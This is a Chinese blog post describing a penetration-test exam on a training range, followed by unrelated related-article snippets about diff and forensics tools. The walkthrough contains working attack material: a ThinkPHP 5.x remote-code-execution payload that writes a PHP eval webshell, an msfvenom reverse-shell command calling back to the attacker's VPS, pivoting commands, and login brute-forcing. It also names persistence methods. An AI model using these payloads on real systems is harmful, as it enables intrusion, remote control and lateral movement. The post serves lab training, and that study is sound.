合天网安的渗透测试考核过程

article/2025/3/4 1:00:32

首先拿到考核内容的ip之后,我们首先进行渗透测试的第一个内容就是 信息收集:

使用kali自带的dirb对目标网站进行一个扫描,同理,类似的软件还有dirsearch

当然,这里使用自带的也可以用,个人感觉,dirb好用一点:

小提示;就是考核用的靶场,大家就看看,了解一下应用的过程

然后根据扫出来的结果,访问一下这些页面:

发现这个是用的thinkphp5.1的版本,而我们知道的就是thinkphp5.x版本的都存在漏洞,这些漏洞都是被爆出来过的,所以,在这里,直接在网上就可以找到可以利用的漏洞poc

比如我找到的这个

s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1[]=muma.php&vars[1][]=%3C?php%20@eval($_POST['qwe']);?%3E

写出这个poc,可以通过burp抓包之后,上传上去,或者前面直接加上这个的网址,直接输入进去,就可以把这个木马直接进行一个写入

 之后就用蚁剑进行一个连接,连接进去之后,嗐,通俗点讲,就看得出这就是一个养蛊的机器,哈哈哈,这里就不多说了,就相当于拿到了一个shell,在这里我们也知道这是一个windows的系统。因为是考核,所以不需要做什么流量隐藏,也不需要去做什么权限维持,如果是现实的话,就需要对自己的权限进行一个维持,比如:shift粘贴键,或者注册表,启动项什么的。

话不多说,喜欢思考的可以去看看一些大神写的,如何权限维持,和隐藏流量。

接下来就是上线msf,当然,也可以使用cs攻击,但是这里我当时先用的msf

在自己的vps里面先写一个反弹shell的木马文件

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=(自己vps的ip) lport=(端口) -f exe -o muma.exe

使用这个命令写一个木马,然后,将这个木马从vps下载下来到自己的电脑里面,接着就是利用蚁剑上传文件的功能进行一个上传

上传之后,在vps里面,进入msf模块,输入msfconsole,然后开启监听

 监听开启之后,就可以利用蚁剑,进入cmd页面,直接启动我们的木马,输入命令:start muma.exe

然后我们的vps就可以接收到这个会话,接着我们就可以进入会话,查看一些信息

 上面输入的chcp 65001是为了防止乱码,,这里就可以看到这个机器的内网ip的情况了

这个时候,我们可以接着利用蚁剑上传一个文件:fscan64.exe,这个可以扫描出对方内网存活主机的一个情况

 

 可以查看到一些端口信息,还有同网段之下的一个 电脑的ip,这个时候,我们分析一下这些可以利用的,比如这个2.174的这个,开放了一个80端口,即web服务

这个时候我们可以建立socks代理,然后扫描一下这个

run autoroute -s 172.26.2.0/24

run autoroute -p

use auxiliary/server/socks_proxy

exploit –j 

 配置proxychains代理

vim /etc/proxychains.conf

socks5 127.0.0.1 1081

代理namp扫描内网

proxychains nmap -sT -Pn -n -T4 172.26.2.174

 得到的跟刚刚一样的,80端口可以利用的

通过proxychains  dirb  http://172.26.2.174:80/扫描敏感路径得到admin后台路径

 扫到一个后台的登陆页面,改完浏览器代理之后我们进去看一下

 发现了这个,然后我们拿到这个之后,就可以利用burp抓包,然后对这个进行一个用户名密码的爆破

爆破也需要更改代理

设置完字典之后,还有一些基础操作之后,就可以进行爆破,这里用的是用户名和密码一起爆破的

 得到了用户名和密码,比较简单,现在就可以登陆进去了

 登陆进去之后发现这里有一个语言管理模块,然后,写一个木马进去,如图

然后就可以利用蚁剑,因为这里是内网了,所以需要更改蚁剑的代理,然后连接这个木马:

这就进入了第二台机器的后台了,相当于拿到了第二台机器的shell,那么接着需要做的事情就很简单,跟之前的基本一样,上传fscan,探测内网存活主机,根据暴露的信息进行一个利用,基本操作就是一样的,后面的就不多讲了,这个过程呢就相当于一个简单的渗透过程,从外网打进内网,在内网的一些简单的信息收集,并且利用。 


http://chatgpt.dhexx.cn/article/cgpEbDLQ.shtml

相关文章

BurpSuite实战——合天网安实验室学习笔记

burpsuite是一款功能强大的用于攻击web应用程序的集成平台,通常在服务器和客户端之间充当一个双向代理,用于截获通信过程中的数据包,对于截获到的包可以人为的进行修改和重放。 此BurpSuite实战主要包括两个实验:分别是使用burp进…

数据取证三剑客 ——合天网安实验室学习笔记

实验链接 通过该实验了解文件恢复、数据提取的相关技术及应用、熟练掌握三款相关开源工具foremost、scalpel、bulk_exetractor的使用。 链接:http://www.hetianlab.com/expc.do?ce6ca30fb8-e0c2-41f3-8335-731e91774df4 实验简介 实验所属系列: 数据…

开发神器之BeyondCompare4.0工程代码比较工具

超好用文件对比工具 – Beyond Compare 具备的丰富实用功能: - 并列比较文件夹、FTP 网站或 Zip 文件; - 为以后的比较保存快照; - 类似浏览器的界面; - 可扩展子文件夹; - 隐藏比较不需要的文件夹; …

6 款代码对比工具

点击上方“朱小厮的博客”,选择“设为星标” 后台回复”加群“获取公众号专属群聊入口 来源:rrd.me/fTS4c 在程序开发的过程中,程序员会经常对源代码以及库文件进行代码对比,在这篇文章里我们向大家介绍六款程序员常用的代码比较工…

Monaco-Editor在Vue中使用(实现代码编辑与diff代码比较)

Monaco在线代码编辑器使用总结 1.什么是Monaco Monaco编辑器是为VS代码提供支持的代码编辑器官方API文档 2.Monaco Editor安装及使用 2.1安装 npm install monaco-editor --save-devnpm install monaco-editor-webpack-plugin --save-dev2.2配置vue.config.js const Mona…

程序员必备 代码比较工具 Beyond Compare 4

封面图 推荐一个代码比较工具,名字叫 Beyond Compare 4,真得很好用,选择两个文件夹,然后两边会同步打开都有的文件夹/文件,打开文件后,标有红色的地方就是两个文件的不同处。唯一缺点就是试用期只有 30 天&…

代码对比工具,我就用这6个!

点击上方“程序猿技术大咖”,关注并选择“设为星标” 回复“加群”获取入群讨论资格! 程序开发的过程中,程序员会经常对源代码以及库文件进行代码对比,在这篇文章里我们向大家介绍六款程序员常用的代码比较工具。 WinMerge WinMer…

代码对比工具,我就用这 6 个!

作者:yueliang2100 blog.csdn.net/yueliang2100/article/details/82190257 在程序开发的过程中,程序员会经常对源代码以及库文件进行代码对比,在这篇文章里我们向大家介绍六款程序员常用的代码比较工具。 1、WinMerge WinMerge是一款运行于W…

代码比较工具-beyond Compare4.0

超好用文件对比工具 – Beyond Compare 具备的丰富实用功能: - 并列比较文件夹、FTP 网站或 Zip 文件; - 为以后的比较保存快照; - 类似浏览器的界面; - 可扩展子文件夹; - 隐藏比较不需要的文件夹; …

程序员喜欢的5款最佳代码比较工具

俗话说:三句不离本行,对于程序员这个可爱的群体来说也是一样,即使面对无休无止的编程工作,程序员们依旧任劳任怨的埋头苦干,梦想着用自己码下的代码改变世界。工欲善其事,必先利其器,每一位程序员都有自己私…

几款比较常用的代码比较工具

文章来源:分享几款比较常用的代码比较工具 俗话说:三句不离本行,对于程序员这个可爱的群体来说也是一样,即使面对无休无止的编程工作,程序员们依旧任劳任怨的埋头苦干,梦想着用自己码下的代码改变世界。工欲…

Beyond Compare 代码比较工具

一、下载 官网下载地址: https://www.scootersoftware.com/download.php 选择 Windows 系统,简体中文版本,点击下载。 下载完成 二、安装 步骤1:双击安装包 步骤2:进入安装向导,点击下一步 步骤3&a…

分享几款比较常用的代码比较工具

公众号关注 “大鱼机器人” 设为 “星标”,重磅干货,第一时间送达! 素材来源:网络 作者:yueliang2100 整理:strongerHuang 俗话说:三句不离本行,对于程序员这个可爱的群体来说也是一…

程序员代码对比工具,就用这7个!

来源公众号:搜云技术库 在程序开发的过程中,程序员会经常对源代码以及库文件进行代码对比,在这篇文章里我们向大家介绍7款程序员常用的代码比较工具。 一、WinMerge 图片 WinMerge是一款运行于Windows系统下的文件比较和合并工具,…

代码比较工具Beyond Compare 4(亲测有效)

代码比较工具Beyond Compare 4 一、便携免安装破解版,下载地址: 链接:https://pan.baidu.com/s/1vGKnPh6WMhk_bYJyJyKqXw 提取码:dasf 复制这段内容后打开百度网盘手机App,操作更方便哦 便携免安装破解版&#xff0…

程序员常用的代码比较工具,你更喜欢哪款?

目录 💡 Linux 命令行的对比工具 一. diff 二. vimdiff命令 💡 GUI 比对工具 三. WinMerge 四. Diffuse 五. Code Compare 六. Beyond Compare 七. UltraCompare 八. Altova DiffDog 九. Kompare 十. Meld 十一. XXdiff 十二. KDiff3 十…

9款代码比较工具

对于经常写代码,又改代码的程序员来说,如果之前写的代码,过了很久又需要改,那么查找不同之处相当困难。如果这时候有一款代码比较工具,将会非常方便。W3Cschool 资深用户归纳总结 9 款常用的代码比较工具,赶…

VSCode批量代码比较

前言 最近因为工作原因,需要找出一个工程里面修改过的地方。VSCode里自带代码比较功能,可以高亮代码不同的地方。然而手动一个个打开文件来比较显然非常的繁琐,在网上检索后发现并没有相关的方法。因此,为了解决这个问题&#xf…

三款免费好用的代码对比工具,丢弃BeyondCompare

代码比较是日常开发经常需要做的工作,比如说源代码对比、文档对比,甚至是excel表格对比。 这里推荐三款免费的对比工具。 1、winMerge 下载地址:https://winmerge.org/downloads/?langen winMerge的大小只有7M,轻量级&#xf…

开发者需要的 9 款代码比较工具

对于经常写代码,又改代码的程序员来说,如果之前写的代码,过了很久又需要改,那么查找不同之处相当困难。如果这时候有一款代码比较工具,将会非常方便。W3Cschool 资深用户归纳总结 9 款常用的代码比较工具,赶…